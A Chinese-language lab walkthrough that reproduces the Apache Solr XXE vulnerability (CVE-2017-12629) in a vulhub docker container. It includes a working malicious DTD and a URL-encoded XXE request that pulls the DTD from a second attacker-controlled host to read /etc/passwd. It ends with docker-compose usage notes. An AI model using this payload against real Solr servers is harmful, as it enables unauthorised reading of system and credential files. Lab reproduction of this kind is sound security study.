声明
好好学习,天天向上
漏洞描述
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。
影响范围
Apache Solr < 7.1
Apache Lucene < 7.1(很多组件都用到这个,比如ES)
复现过程
这里使用7.0.1版本
使用vulhub
cd /app/vulhub-20201028/solr/CVE-2017-12629-RCE
使用docker启动
docker-compose up -d
启动后可访问IP:8983,需要稍等一会哦
我这里的思路是,先构造一个站点,放置dtd文件(里面写执行的代码),然后用solr去包含这个dtd站点路径,就会自动读取dtd文件中的文件路径
构造dtd文件站点,使用phpstudy
创建1.dtd,dtd文件内容如下
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">
访问solr服务,触发我们的dtd文件,浏览器输入如下payload,里面的IP和文件名称根据实际情况修改,我的solr是192.168.239.170,文件名称是1.dtd
http://192.168.239.129:8983/solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f192.168.239.170%2f1.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser
成功读取passwd
使用完后关闭镜像
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down